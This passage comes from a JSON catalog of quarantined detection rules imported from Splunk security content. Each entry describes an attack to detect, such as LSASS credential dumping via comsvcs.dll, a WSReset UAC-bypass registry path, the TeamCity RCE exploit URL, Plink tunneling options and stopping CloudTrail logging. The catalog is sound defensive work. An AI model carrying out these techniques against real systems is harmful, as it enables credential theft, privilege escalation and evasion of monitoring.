"2026-05-04", "upstream_path": "detections/web/f5_tmui_authentication_bypass.yml" } }, { "id": "splunk-security-content-89275e7e-0548-11ec-bf75-acde48001122", "type": "detection", "name": "Get-DomainTrust with PowerShell Script Block", "description": "The following analytic detects the execution of the Get-DomainTrust command from PowerView using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed inspection. Identifying this activity is significant because it may indicate an attempt to gather domain trust information, which is often a precursor to lateral movement or privilege escalation. If confirmed malicious, this activity could enable an attacker to map trust relationships within the domain, potentially leading to further exploitation and compromise of additional systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domaintrust-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89275e7e-0548-11ec-bf75-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domaintrust_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-892dfeaf-461d-4a78-aac8-b07e185c9bce", "type": "detection", "name": "PingID New MFA Method Registered For User", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a PingID (PingOne) account. It leverages JSON logs from PingID, specifically looking for successful device pairing events. This activity is significant as adversaries who gain unauthorized access to a user account may register a new MFA method to maintain persistence. If confirmed malicious, this could allow attackers to bypass existing security measures, maintain long-term access, and potentially escalate their privileges within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1556.006", "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "892dfeaf-461d-4a78-aac8-b07e185c9bce", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_new_mfa_method_registered_for_user.yml" } }, { "id": "splunk-security-content-892eb674-3344-4143-8e52-4775b1daf3f1", "type": "detection", "name": "Linux Auditd Private Keys and Certificate Enumeration", "description": "The following analytic detects suspicious attempts to find private keys, which may indicate an attacker's effort to access sensitive cryptographic information. Private keys are crucial for securing encrypted communications and data, and unauthorized access to them can lead to severe security breaches, including data decryption and identity theft. By monitoring for unusual or unauthorized searches for private keys, this analytic helps identify potential threats to cryptographic security, enabling security teams to take swift action to protect the integrity and confidentiality of encrypted information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-private-keys-and-certificate-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "892eb674-3344-4143-8e52-4775b1daf3f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_private_keys_and_certificate_enumeration.yml" } }, { "id": "splunk-security-content-8943b567-f14d-4ee8-a0bb-2121d4ce3184", "type": "detection", "name": "Dump LSASS via comsvcs DLL", "description": "The following analytic detects the behavior of dumping credentials from memory by exploiting the Local Security Authority Subsystem Service (LSASS) using the comsvcs.dll and MiniDump via rundll32. This detection leverages process information from Endpoint Detection and Response (EDR) logs, focusing on specific command-line executions. This activity is significant because it indicates potential credential theft, which can lead to broader system compromise, persistence, lateral movement, and privilege escalation. If confirmed malicious, attackers could gain unauthorized access to sensitive information, leading to data theft, ransomware attacks, or other damaging outcomes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dump-lsass-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8943b567-f14d-4ee8-a0bb-2121d4ce3184", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dump_lsass_via_comsvcs_dll.yml" } }, { "id": "splunk-security-content-894f48ea-8d85-4dcd-9132-c66cdb407c9b", "type": "detection", "name": "Windows Apache Benchmark Binary", "description": "The following analytic detects the execution of the Apache Benchmark binary (ab.exe), commonly used by MetaSploit payloads. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the original file name is ab.exe. This activity is significant as it may indicate the presence of a MetaSploit attack, which uses Apache Benchmark to generate malicious payloads. If confirmed malicious, this could lead to unauthorized network connections, further system compromise, and potential data exfiltration. Immediate investigation is required to determine the intent and scope of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-apache-benchmark-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "894f48ea-8d85-4dcd-9132-c66cdb407c9b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_apache_benchmark_binary.yml" } }, { "id": "splunk-security-content-894fc43e-6f50-47d5-a68b-ee9ee23e18f4", "type": "detection", "name": "System User Discovery With Whoami", "description": "The following analytic detects the execution of `whoami.exe` without any arguments. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because both Red Teams and adversaries use `whoami.exe` to identify the current logged-in user, aiding in situational awareness and Active Directory discovery. If confirmed malicious, this behavior could indicate an attacker is gathering information to further compromise the system, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-user-discovery-with-whoami.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "894fc43e-6f50-47d5-a68b-ee9ee23e18f4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_user_discovery_with_whoami.yml" } }, { "id": "splunk-security-content-8976744a-ae7a-46a4-8128-690df85c2af4", "type": "detection", "name": "Windows Visual Basic Commandline Compiler DNSQuery", "description": "The following analytic detects instances where vbc.exe, the Visual Basic Command Line Compiler, initiates DNS queries. Normally, vbc.exe operates locally to compile Visual Basic code and does not require internet access or to perform DNS lookups. Therefore, any observed DNS activity originating from vbc.exe is highly suspicious and indicative of potential malicious activity. This behavior often suggests that a malicious payload is masquerading as the legitimate vbc.exe process to establish command-and-control (C2) communication, resolve domains for data exfiltration, or download additional stages of malware. Security teams should investigate the process's parent, command-line arguments, and the resolved domains for further indicators of compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-visual-basic-commandline-compiler-dnsquery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8976744a-ae7a-46a4-8128-690df85c2af4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_visual_basic_commandline_compiler_dnsquery.yml" } }, { "id": "splunk-security-content-898debf4-3021-11ec-ba7c-acde48001122", "type": "detection", "name": "Disable Defender Spynet Reporting", "description": "The following analytic detects the modification of the registry to disable Windows Defender SpyNet reporting. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender SpyNet settings. This activity is significant because disabling SpyNet reporting can prevent Windows Defender from sending telemetry data, potentially allowing malicious activities to go undetected. If confirmed malicious, this action could enable an attacker to evade detection, maintain persistence, and carry out further attacks without being flagged by Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-spynet-reporting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "898debf4-3021-11ec-ba7c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_spynet_reporting.yml" } }, { "id": "splunk-security-content-89a58e5f-1365-4793-b45c-770abbb32b6c", "type": "detection", "name": "JetBrains TeamCity RCE Attempt", "description": "The following analytic detects attempts to exploit the CVE-2023-42793 vulnerability in JetBrains TeamCity On-Premises.\nIt identifies suspicious POST requests to /app/rest/users/id:1/tokens/RPC2, leveraging the Web datamodel to monitor specific URL patterns and HTTP methods.\nThis activity is significant as it may indicate an unauthenticated attacker attempting to gain administrative access via Remote Code Execution (RCE).\nIf confirmed malicious, this could allow the attacker to execute arbitrary code, potentially compromising the entire TeamCity environment and leading to further unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-rce-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89a58e5f-1365-4793-b45c-770abbb32b6c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_rce_attempt.yml" } }, { "id": "splunk-security-content-89dad3ee-57ec-43dc-9044-131c4edd663f", "type": "detection", "name": "Windows Service Create SliverC2", "description": "The following analytic detects the creation of a Windows service named \"Sliver\" with the description \"Sliver Implant,\" indicative of SliverC2 lateral movement using the PsExec module. It leverages Windows EventCode 7045 from the System Event log to identify this activity. This behavior is significant as it may indicate an adversary's attempt to establish persistence or execute commands remotely. If confirmed malicious, this activity could allow attackers to maintain control over the compromised system, execute arbitrary code, and further infiltrate the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-sliverc2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89dad3ee-57ec-43dc-9044-131c4edd663f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_sliverc2.yml" } }, { "id": "splunk-security-content-89dddbad-369a-4f8a-ace2-2439218735bc", "type": "detection", "name": "Web Spring Cloud Function FunctionRouter", "description": "The following analytic identifies HTTP POST requests to the Spring Cloud Function endpoint containing \"functionRouter\" in the URL. It leverages the Web data model to detect these requests based on specific fields such as http_method, url, and http_user_agent. This activity is significant because it targets CVE-2022-22963, a known vulnerability in Spring Cloud Function, which has multiple proof-of-concept exploits available. If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to unauthorized access, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-spring-cloud-function-functionrouter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "89dddbad-369a-4f8a-ace2-2439218735bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_spring_cloud_function_functionrouter.yml" } }, { "id": "splunk-security-content-8a1259cb-0ea7-409c-8bfe-74bad89259f9", "type": "detection", "name": "Windows AD ServicePrincipalName Added To Domain Account", "description": "The following analytic detects the addition of a Service Principal Name (SPN) to a domain account. It leverages Windows Event Code 5136 and monitors changes to the servicePrincipalName attribute. This activity is significant because it may indicate an attempt to perform Kerberoasting, a technique where attackers extract and crack service account passwords offline. If confirmed malicious, this could allow an attacker to obtain cleartext passwords, leading to unauthorized access and potential lateral movement within the domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-serviceprincipalname-added-to-domain-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a1259cb-0ea7-409c-8bfe-74bad89259f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_serviceprincipalname_added_to_domain_account.yml" } }, { "id": "splunk-security-content-8a1b22eb-50ce-4e26-a691-97ff52349569", "type": "detection", "name": "O365 Admin Consent Bypassed by Service Principal", "description": "The following analytic identifies instances where a service principal in Office 365 Azure Active Directory assigns app roles without standard admin consent. It leverages `o365_management_activity` logs, specifically focusing on the 'Add app role assignment to service principal' operation. This activity is significant for SOCs as it may indicate a bypass of critical administrative controls, potentially leading to unauthorized access or privilege escalation. If confirmed malicious, this could allow an attacker to misuse automated processes to assign sensitive permissions, compromising the security of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-admin-consent-bypassed-by-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a1b22eb-50ce-4e26-a691-97ff52349569", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_admin_consent_bypassed_by_service_principal.yml" } }, { "id": "splunk-security-content-8a2f3ca2-4eb5-4389-a549-14063882e537", "type": "detection", "name": "AWS Defense Evasion Stop Logging Cloudtrail", "description": "The following analytic detects `StopLogging` events in AWS CloudTrail logs. It leverages CloudTrail event data to identify when logging is intentionally stopped, excluding console-based actions and focusing on successful attempts. This activity is significant because adversaries may stop logging to evade detection and operate stealthily within the compromised environment. If confirmed malicious, this action could allow attackers to perform further activities without being logged, hindering incident response and forensic investigations, and potentially leading to unauthorized access or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-stop-logging-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a2f3ca2-4eb5-4389-a549-14063882e537", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_stop_logging_cloudtrail.yml" } }, { "id": "splunk-security-content-8a618ade-ca8f-4d04-b972-2d526ba59924", "type": "detection", "name": "Windows Process Injection Remote Thread", "description": "The following analytic detects suspicious remote thread execution in processes such as Taskmgr.exe, calc.exe, and notepad.exe, which may indicate process injection by malware like Qakbot. This detection leverages Sysmon EventCode 8 to identify remote thread creation in specific target processes. This activity is significant as it often signifies an attempt by malware to inject malicious code into legitimate processes, potentially leading to unauthorized code execution. If confirmed malicious, this could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence on the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-remote-thread.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a618ade-ca8f-4d04-b972-2d526ba59924", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_remote_thread.yml" } }, { "id": "splunk-security-content-8a9c1d2e-3f4b-5c6d-7e8f-9a0b1c2d3e4f", "type": "detection", "name": "Cisco Secure Firewall - SSH Connection to sshd_operns", "description": "This analytic detects inbound SSH connections to the sshd_operns service on network devices using Cisco Secure Firewall Intrusion Events.\nAPT actors have been observed enabling sshd_operns and opening it on non-standard ports to maintain encrypted remote access to compromised network infrastructure.\nThis detection leverages Snort signature 65368 to identify connections to this service, which when combined with other indicators may signal persistent access mechanisms established by threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-ssh-connection-to-sshd-operns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a9c1d2e-3f4b-5c6d-7e8f-9a0b1c2d3e4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___ssh_connection_to_sshd_operns.yml" } }, { "id": "splunk-security-content-8a9e5f2b-6d4c-4e7f-9b3a-1c8d7f5e2a9b", "type": "detection", "name": "Cisco ASA - Device File Copy to Remote Location", "description": "This analytic detects file copy operations to remote locations on Cisco ASA devices via CLI or ASDM.\nAdversaries may exfiltrate device files including configurations, logs, packet captures, or system data to remote servers using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP. While legitimate backups to centralized servers are common, copies to unexpected destinations may indicate data exfiltration to attacker-controlled infrastructure.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing copy commands with remote protocol indicators (tftp:, ftp:, http:, https:, smb:, scp:).\nInvestigate copies to unexpected destinations, from non-administrative accounts, or outside approved maintenance windows.\nWe recommend adapting the detection filters to exclude known legitimate backup activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005", "T1041", "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-device-file-copy-to-remote-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8a9e5f2b-6d4c-4e7f-9b3a-1c8d7f5e2a9b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___device_file_copy_to_remote_location.yml" } }, { "id": "splunk-security-content-8aac5e1e-0fab-4437-af0b-c6e60af23eed", "type": "detection", "name": "Windows Protocol Tunneling with Plink", "description": "This analytic detects the use of Plink (including renamed versions like pvhost.exe) for protocol tunneling, which may be used for egress or lateral movement within an organization. It identifies specific command-line options (-R, -L, -D, -l, -N, -P, -pw) commonly used for port forwarding and tunneling by analyzing process execution logs from Endpoint Detection and Response (EDR) agents. This activity is significant as it may indicate an attempt to bypass network security controls or establish unauthorized connections. If confirmed malicious, this could allow an attacker to exfiltrate data, move laterally across the network, or maintain persistent access, posing a severe threat to the organization's security. The detection covers both the original Plink executable and potential renamed versions, enhancing its ability to catch evasion attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-protocol-tunneling-with-plink.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8aac5e1e-0fab-4437-af0b-c6e60af23eed", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_protocol_tunneling_with_plink.yml" } }, { "id": "splunk-security-content-8acbc04c-c882-11eb-b060-acde48001122", "type": "detection", "name": "Powershell Fileless Script Contains Base64 Encoded Content", "description": "The following analytic detects the execution of PowerShell scripts containing Base64 encoded content, specifically identifying the use of `FromBase64String`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as Base64 encoding is often used by attackers to obfuscate malicious payloads, making it harder to detect. If confirmed malicious, this could lead to code execution, allowing attackers to run arbitrary commands and potentially compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-fileless-script-contains-base64-encoded-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8acbc04c-c882-11eb-b060-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_fileless_script_contains_base64_encoded_content.yml" } }, { "id": "splunk-security-content-8b07c2c9-0cde-4c44-9fa6-59dcf2b25777", "type": "detection", "name": "Cisco NVM - Susp Script From Archive Triggering Network Activity", "description": "This analytic detects script execution (`wscript.exe` or `cscript.exe`) triggered from compressed files opened directly using\n`explorer.exe`, `winrar.exe`, or `7zFM.exe`.\nWhen a user double clicks on a \".js\" file from within one of these compressed files. Its extracted temporally in the temp directory in folder with certain markers.\nIt leverages Cisco Network Visibility Module (NVM) flow data, in order to look for a specific parent/child relationship and an initiated network connection.\nThis behavior is exploited by threat actors such as Scarlet Goldfinch to deliver and run malicious scripts as an initial access technique.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-susp-script-from-archive-triggering-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b07c2c9-0cde-4c44-9fa6-59dcf2b25777", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___susp_script_from_archive_triggering_network_activity.yml" } }, { "id": "splunk-security-content-8b1297bc-6204-11ec-b7c4-acde48001122", "type": "detection", "name": "Suspicious Kerberos Service Ticket Request", "description": "The following analytic detects suspicious Kerberos Service Ticket (TGS) requests where the requesting account name matches the service name, potentially indicating an exploitation attempt of CVE-2021-42278 and CVE-2021-42287. This detection leverages Event ID 4769 from Domain Controller and Kerberos events. Such activity is significant as it may represent an adversary attempting to escalate privileges by impersonating a domain controller. If confirmed malicious, this could allow an attacker to take control of the domain controller, leading to complete domain compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-kerberos-service-ticket-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b1297bc-6204-11ec-b7c4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_kerberos_service_ticket_request.yml" } }, { "id": "splunk-security-content-8b4e3d62-f743-11ee-9f6e-acde48001123", "type": "detection", "name": "AWS Bedrock Delete Knowledge Base", "description": "The following analytic identifies attempts to delete AWS Bedrock Knowledge Bases, which are resources that store and manage domain-specific information for AI models. It monitors AWS CloudTrail logs for DeleteKnowledgeBase API calls. This activity could indicate an adversary attempting to remove knowledge bases after compromising credentials, potentially to disrupt business operations or remove traces of data access. Deleting knowledge bases could impact model performance, remove critical business context, or be part of a larger attack to degrade AI capabilities. If confirmed malicious, this could represent a deliberate attempt to cause service disruption or data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-delete-knowledge-base.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b4e3d62-f743-11ee-9f6e-acde48001123", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_delete_knowledge_base.yml" } }, { "id": "splunk-security-content-8b5901bc-da63-11eb-be43-acde48001122", "type": "detection", "name": "WSReset UAC Bypass", "description": "The following analytic detects a suspicious modification of the registry aimed at bypassing User Account Control (UAC) by leveraging WSReset.exe. It identifies the creation or modification of specific registry values under the path \"*\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command*\". This detection uses data from Endpoint Detection and Response (EDR) agents, focusing on process and registry events. This activity is significant because UAC bypass techniques can allow attackers to execute high-privilege actions without user consent. If confirmed malicious, this could lead to unauthorized code execution and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wsreset-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b5901bc-da63-11eb-be43-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wsreset_uac_bypass.yml" } }, { "id": "splunk-security-content-8b5ef342-065a-11ec-b0fc-acde48001122", "type": "detection", "name": "Get ADUserResultantPasswordPolicy with Powershell", "description": "The following analytic detects the execution of `powershell.exe` running the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy in a Windows domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential enumeration of domain policies, a common tactic for situational awareness and Active Directory discovery by 